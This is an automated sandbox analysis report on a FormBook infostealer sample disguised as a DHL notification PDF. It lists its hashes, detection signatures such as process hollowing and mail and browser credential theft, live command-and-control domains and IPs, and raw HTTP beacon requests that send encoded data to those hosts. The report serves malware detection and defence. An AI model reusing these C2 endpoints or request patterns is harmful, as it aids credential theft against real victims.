Windows Analysis Report
DHL_Notification_pdf.exe

Overview

General Information

Sample Name: DHL_Notification_pdf.exe
Analysis ID: 830435
MD5: 06f7894017e8f6737d228adc14480c83
SHA1: fab1cbdbbb5fc2e76de2622948a02c3e8af17c18
SHA256: bbfb2aacf1ff431d0ed71b54c499d3a56b6bcc90d5137cd78097b40c354c2353
Tags: DHLexeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: DHL_Notification_pdf.exe ReversingLabs: Detection: 53%
Source: DHL_Notification_pdf.exe Virustotal: Detection: 46% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqby Avira URL Cloud: Label: malware
Source: http://www.traindic.top/hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.amirah.cfd/hpb7/ Avira URL Cloud: Label: phishing
Source: http://www.amirah.cfd Avira URL Cloud: Label: phishing
Source: http://www.traindic.top/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.admet01.club Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/j Avira URL Cloud: Label: malware
Source: http://www.traindic.top Avira URL Cloud: Label: malware
Source: http://www.yongleproducts.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.admet01.club/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: bohndigitaltech.com Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe ReversingLabs: Detection: 18%
Machine Learning detection for sample
Source: DHL_Notification_pdf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.ldndbi.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.ldndbi.exe.5d0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: DHL_Notification_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_Notification_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 4x nop then xor ebx, ebx 3_2_0040DCB4

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50513 -> 8.8.8.8:53
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.0dhy.xyz
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.46.160.97 198.46.160.97
Source: Joe Sandbox View IP Address: 67.222.24.48 67.222.24.48
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 68 52 6d 6b 33 2d 62 70 38 4d 73 30 7a 41 28 4d 62 67 79 61 5a 5f 59 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 7e 53 50 68 6f 4d 56 75 35 66 50 46 49 49 58 6f 42 58 5a 7a 69 2d 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oN~SPhoMVu5fPFIIXoBXZzi-M.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 56 53 38 77 58 5a 28 5f 4b 69 41 4b 75 32 46 6c 64 39 62 79 62 61 77 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCVS8wXZ(_KiAKu2Fld9bybaw.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 6c 30 43 58 66 75 4a 63 51 5f 43 72 7a 77 35 45 70 77 32 48 7e 37 30 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRel0CXfuJcQ_Crzw5Epw2H~70.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 56 2d 46 66 46 52 71 72 66 4d 66 43 58 73 45 64 36 61 4c 43 47 70 45 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFV-FfFRqrfMfCXsEd6aLCGpE.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:29:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:47 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 